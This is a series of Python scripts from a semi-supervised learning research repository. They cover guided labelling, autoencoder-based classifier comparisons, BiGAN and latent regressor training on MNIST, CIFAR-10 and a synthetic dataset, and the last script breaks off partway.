# Create unlabelled and labelled set
x_train_unlabelled_new = X_train
y_train_unlabelled_new = y_train
x_train_labelled = np.empty([0, 32, 32, 3])
y_train_labelled = np.empty([0, 1])
# Loop until test accuracy is at state of art level
for iteration in range(1, max_num_iterations):
print('\nIteration ' + str(iteration + 1) + '\n')
if iteration == 2:
y_train_labelled = y_train_labelled.reshape((y_train_labelled.shape[0],))
# Calculate entropy of classifier for all examples in unlabelled set
predictions = fully_supervised_classifier.predict(x_train_unlabelled_new)
x_train_unlabelled_entropy = (-predictions * np.log2(predictions)).sum(axis=1)
# Find indices of examples with 1000 highest entropy in unlabelled set
max_entropy_indices = x_train_unlabelled_entropy.argsort()[-num_labels_added_per_iter:][::-1]
# Add these examples to labelled set and remove from unlabelled set
x_train_labelled = np.concatenate((x_train_labelled, x_train_unlabelled_new[max_entropy_indices]))
y_train_labelled = np.concatenate((y_train_labelled, y_train_unlabelled_new[max_entropy_indices]))
y_train_labelled_one_hot = keras.utils.to_categorical(y_train_labelled, num_classes)
x_train_unlabelled_new = np.delete(x_train_unlabelled_new, max_entropy_indices, axis=0)
y_train_unlabelled_new = np.delete(y_train_unlabelled_new, max_entropy_indices)
# Train classifier
print('Training on ' + str(len(x_train_labelled)) + ' most confusing examples\n')
# Randomly initialize CNN
random_encoder = deterministic_encoder_model()
fully_supervised_classifier = classifier_e_trainable_model(random_encoder)
# Train CNN
fully_supervised_classifier.fit(x_train_labelled, y_train_labelled_one_hot,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=fully_supervised_callbacks,
validation_split=val_split)
fully_supervised_classifier.load_weights(fully_supervised_classifier_path)
# Update and print test accuracy
score = fully_supervised_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
fully_supervised_acc[iteration] = 100 * score[1]
fully_num_labels[iteration] = x_train_labelled.shape[0]
print('Test accuracy with ' + str(len(x_train_labelled)) + ' most confusing examples labelled: '
+ str(fully_supervised_acc[iteration]) + '%\n')
# Print accuracies
print(pretrained_acc)
print(fully_supervised_acc)
# Save results to file
np.savetxt('classifier1_numlabels.txt', pretrained_num_labels, fmt='%d')
np.savetxt('classifier2_numlabels.txt', fully_num_labels, fmt='%d')
np.savetxt('classifier1_acc.txt', pretrained_acc, fmt='%f')
np.savetxt('classifier2_acc.txt', fully_supervised_acc, fmt='%f')
# =====================================
# Visualize results
# =====================================
plt.figure()
plt.plot(pretrained_num_labels, pretrained_acc)
plt.xlabel('No. of labelled examples available')
plt.ylabel('Test Accuracy (%)')
plt.savefig('pretrained_encoder_guided_labeling.png')
plt.figure()
plt.plot(fully_num_labels, fully_supervised_acc)
plt.xlabel('No. of labelled examples available')
plt.ylabel('Test Accuracy (%)')
plt.savefig('fully_supervised_guided_labeling.png')
'''# Generate confusion matrix
predictions = cnn.predict_classes(x_test)
plt.figure(2)
cm = confusion_matrix(y_test, predictions)
plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Reds)
tick_marks = np.arange(num_classes)
plt.xticks(tick_marks, num_classes)
plt.yticks(tick_marks, num_classes)
fmt = 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True labels')
plt.xlabel('Predicted labels')
plt.title('MNIST Confusion Matrix')
plt.show()''' | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,508 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/keras_conv_ae_compare.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from mnist_conv_ae_models import *
from keras.callbacks import EarlyStopping
# Set random seed for reproducibility
np.random.seed(1330)
## Load data set and change format
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1))
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1))
# Convert test labels to one hot format
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
## Define and initialize classifier models
# Load pretrained encoder model and set non-trainable
pretrained_e = encoder_model()
pretrained_e.load_weights('encoder.h5')
pretrained_e.trainable=False
# Initialize classifier with e learned from autoencoder and frozen
mnist_classifier_pretrained_e = classifier_e_frozen_model(pretrained_e)
# Initialize classifier with randomly initialized e
random_e = encoder_model()
mnist_classifier_random_e = classifier_e_trainable_model(random_e)
# Print number of trainable and non-trainable parameters in both classifiers
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.non_trainable_weights)]))
print('Classifier w/ Unsupervised Encoder + FC Layers')
print('Total parameters: {:,}'.format(trainable_count + non_trainable_count))
print('Trainable parameters: {:,}'.format(trainable_count))
print('Non-trainable parameters: {:,}'.format(non_trainable_count))
# Print number of trainable and non-trainable parameters
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: {:,}'.format(trainable_count + non_trainable_count))
print('Trainable paramseter: {:,}'.format(trainable_count))
print('Non-trainable parameters: {:,}'.format(non_trainable_count))
## Pre-training
# Set hyperparameters and specify training details
batch_size = 100
epochs = 100
val_split = 1/5.
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto')]
# Set number of labelled examples to investigate and no. of trainings to average test accuracy over
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 60000]
num_iterations = 5
## Create arrays to hold accuracy of classifiers
classifier_pretrained_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
# Try all no. of specified examples
for index, num in enumerate(num_unlabelled):
print('Number of labelled examples: {:,}'.format(num))
# Reset to zero for each
pretrained_acc_sum = 0
random_acc_sum = 0
num_iterations = len(x_train) / num
# Average test accuracy reading over num_iterations readings
for iteration in range(num_iterations):
# Reduce size of training sets
reduced_x_train = x_train[(iteration * num) : ((iteration+1) * num), :, :, :]
reduced_y_train = y_train_one_hot[(iteration * num) : ((iteration+1) * num), :]
# Compile models
mnist_classifier_pretrained_e.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_random_e.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# Train model with pretrained e
mnist_classifier_pretrained_e.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
shuffle=True,
verbose=1,
callbacks=callbacks,
validation_split=val_split)
# Add test accuracy to sum
score = mnist_classifier_pretrained_e.evaluate(x_test, y_test_one_hot, verbose=0)
pretrained_acc_sum += score[1]
# Train model with random e
mnist_classifier_random_e.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
shuffle=True,
verbose=1,
callbacks=callbacks,
validation_split=val_split)
# Add test accuracy to sum
score = mnist_classifier_random_e.evaluate(x_test, y_test_one_hot, verbose=0)
random_acc_sum += score[1]
## Reinitialize both classifiers
# Classifier with frozen e learned from autoencoder
mnist_classifier_pretrained_e = classifier_e_frozen_model(pretrained_e)
# Classifier with randomly initialized e
random_e = encoder_model()
mnist_classifier_random_e = classifier_e_free_model(random_e)
# Record average classification accuracy for each no. of labelled examples
classifier_pretrained_acc[index] = 100 * pretrained_acc_sum / num_iterations
classifier_random_acc[index] = 100 * random_acc_sum / num_iterations
# Plot comparison graph
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Pretrained Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.show()
# Plot for just pretrained network
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Pretrained E')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show()
# Plot for just purely supervised network
plt.plot(num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Random E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Pretrained Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,509 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_bigan_stochastic_train.py | from keras.optimizers import Adam
import numpy as np
from cifar10_models import encoder_model, generator_model, discriminator_model, bigan_model
from semi_supervised_comparison.functions.auxiliary_funcs import save_models
from semi_supervised_comparison.functions.visualization_funcs import save_imgs, plot_gan_batch_loss,\
plot_gan_epoch_loss, save_reconstructions
from semi_supervised_comparison.functions.data_funcs import get_cifar10
# Set random seed
np.random.seed(1330)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_bigan'
model_path = 'Models/cifar10_bigan'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# =====================================
# Instantiate models
# =====================================
generator = generator_model()
encoder = encoder_model()
discriminator = discriminator_model()
lr = 1e-4
beta_1 = 0.5
beta_2 = 0.999
opt_d = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)
opt_g = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)
generator.trainable = False
encoder.trainable = False
bigan_discriminator = bigan_model(generator, encoder, discriminator)
bigan_discriminator.compile(optimizer=opt_d, loss='binary_crossentropy')
generator.trainable = True
encoder.trainable = True
discriminator.trainable = False
bigan_generator = bigan_model(generator, encoder, discriminator)
bigan_generator.compile(optimizer=opt_g, loss='binary_crossentropy')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 2000
batch_size = 100
# Training settings
num_batches = int(X_train.shape[0] / batch_size)
epoch_save_interval = 10
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
# Select next batch of images from training set
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
# Generator normal distributed latent vector
z = np.random.normal(size=(batch_size, 1, 1, latent_dim))
# Create labels for discriminator inputs
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
# Train the discriminator (img -> z is valid, z -> img is fake)
d_loss = bigan_discriminator.train_on_batch([z, imgs], [fake, valid])
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
# ----------------------------
# Train Generator and Encoder
# ----------------------------
# Train the generator (z -> img_ is valid and img -> z_ is is invalid)
ge_loss = bigan_generator.train_on_batch([z, imgs], [valid, fake])
g_batch_loss_trajectory[epoch * num_batches + batch] = ge_loss[0]
g_epoch_loss_sum += ge_loss[0]
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
d_loss[0], 100 * d_loss[1], ge_loss[0]))
# Get epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
z = np.random.normal(size=(25, 1, 1, latent_dim))
gen_imgs = generator.predict(z)
save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=True)
# Save models to file
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualize results
# =====================================
# Save reconstructions
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,510 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_lr_train.py | from __future__ import print_function, division
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from sd_models import encoder_model, generator_model
from common_models.common_models import latent_reconstructor_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_reconstructions, save_latent_vis, plot_train_loss
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
image_path = 'Images/sd_lr'
model_path = 'Models/sd_lr'
# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# Reshape data to image format
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)
# Normalize data to (-1,1)
X_train = (X_train - 0.5) / 0.5
X_test = (X_test - 0.5) / 0.5
# Samples from prior used to train latent regressor
z_train = np.random.normal(size=(X_train.shape[0], latent_dim))
z_test = np.random.normal(size=(X_test.shape[0], latent_dim))
# =====================================
# Instantiate and compile models
# =====================================
# Instanstiate models
encoder = encoder_model()
generator = generator_model(gan=True)
latent_regressor = latent_reconstructor_model(generator, encoder)
# Compile latent regressor
generator.load_weights('Models/sd_gan_generator.h5')
generator.trainable = False
latent_regressor.compile(optimizer='SGD', loss='mse', metrics=['accuracy'])
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
patience = 5
# Specify training stopping criterion
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = latent_regressor.fit(z_train, z_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(z_test, z_test),
callbacks=callbacks,
verbose=1)
# Replace current encoder and decoder models with that from the saved best autoencoder
decoder = generator_model()
encoder = encoder_model()
latent_reconstructor = latent_reconstructor_model(decoder, encoder)
latent_reconstructor.load_weights(model_path + '.h5')
# Save encoder weights
save_models(path=model_path, encoder=encoder)
# =====================================
# Visualization
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Save latent visualization
save_latent_vis(image_path, X_train, y_train, encoder, num_classes)
# Plot training curves
plot_train_loss(image_path, history)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,511 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_latent_space_statistics.py | from keras.datasets import cifar10
import numpy as np
import keras.utils
import matplotlib.pyplot as plt
from cifar10_models import encoder_model, deterministic_encoder_model
# Define constants
num_classes = 10
latent_dim = 64
encoder = deterministic_encoder_model()
encoder.load_weights('cifar10_bigan_determ_encoder.h5')
# Load MNIST data and split into train and test set
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
X_train = X_train.astype(np.float32) / 255.
X_test = X_test.astype(np.float32) / 255.
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
y_train = y_train.reshape((y_train.shape[0]))
# Encoder training set
latent_spaces = encoder.predict(X_train)
# Get max and min value of entire set for later plotting purposes
